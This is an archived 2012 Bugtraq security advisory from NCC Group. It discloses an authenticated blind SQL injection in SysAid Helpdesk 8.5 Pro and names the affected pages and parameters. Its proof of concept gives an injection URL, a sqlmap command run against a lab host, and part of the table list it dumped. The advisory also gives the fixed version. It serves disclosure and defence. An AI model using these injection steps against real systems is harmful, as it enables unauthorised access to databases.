[<prev] [next>] [day] [month] [year] [list]
Message-ID: <7E45577E4E72EC42BB3F8560D57E755180E839D0@manexchprd01>
Date: Fri, 30 Nov 2012 11:02:29 +0000
From: NCC Group Research <research@...group.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: NGS000241 Technical Advisory: SysAid Helpdesk Pro Blind SQL
Injection
=======
Summary
=======
Name: SysAid Helpdesk Pro - Blind SQL Injection
Release Date: 30 November 2012
Reference: NGS00241
Discoverer: Daniel Compton <daniel.compton@...secure.com>
Vendor: SysAid
Vendor Reference:
Systems Affected: SysAid Helpdesk 8.5 Pro
Risk: High
Status: Published
========
TimeLine
========
Discovered: 12 March 2012
Released: 12 March 2012
Approved: 12 March 2012
Reported: 14 March 2012
Fixed: 1 August 2012
Published: 30 November 2012
===========
Description
===========
SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.
I. VULNERABILITY
-------------------------
SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.
II. BACKGROUND
-------------------------
SyAid is a fully web based helpdesk solution.
http://www.ilient.com/
III. DESCRIPTION
-------------------------
SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.
=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------
The following URL and parameters have been confirmed to suffer from Blind SQL injection.
/AssetManagementList.jsp (GET Parameter: computerID, group1)
AssetManagementChart.jsp (GET Parameter: group1)
/genericreport (POST Parameter: assetID, customSQL, groupFilter)
CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)
/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices
python sqlmap.py
--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null&viewName=Servers%20and%20Network%20devices"
--dbms=mysql -p computerID
--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5
Database: ilient [10 tables]
+-----------------------+
| account |
| agreement |
| asset2ci |
| asset_catalog |
| asset_catalog_files |
| asset_catalog_history |
| asset_catalog_links |
| asset_data_day_data |
| asset_data_month_data |
| asset_data_week_data |
+-----------------------+
===============
Fix Information
===============
Fixed in version 8.5.08
http://www.sysaid.com/bugs-fixed-8-5.htm#8508
Download Product Patch:
http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe
NCC Group Research
http://www.nccgroup.com/research
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>
Powered by blists - more mailing lists